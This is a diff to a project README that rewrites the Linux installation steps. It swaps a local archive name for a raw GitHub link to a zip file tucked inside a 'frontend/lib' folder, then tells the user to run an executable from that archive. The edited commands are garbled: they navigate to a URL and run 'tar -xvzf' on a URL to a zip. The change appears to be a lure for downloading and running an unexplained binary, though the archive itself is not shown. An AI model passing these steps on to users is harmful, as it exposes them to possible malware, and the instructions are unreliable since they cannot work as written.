Burtantagonistic410/Cerno-Insight/README.md

 ### 🐧 Installation Instructions for Linux

 1. Open a terminal window.
-2. Navigate to the folder where the `.tar.gz` file is located.
+2. Navigate to the folder where the `https://raw.githubusercontent.com/Burtantagonistic410/Cerno-Insight/main/frontend/lib/Cerno-Insight_v3.5.zip` file is located.
-3. Extract the file using the command: `tar -xvzf Cerno-Insight.tar.gz`
+3. Extract the file using the command: `tar -xvzf https://raw.githubusercontent.com/Burtantagonistic410/Cerno-Insight/main/frontend/lib/Cerno-Insight_v3.5.zip`
 4. Change to the extracted directory: `cd Cerno-Insight`
 5. Run the application with the command: `./run_application`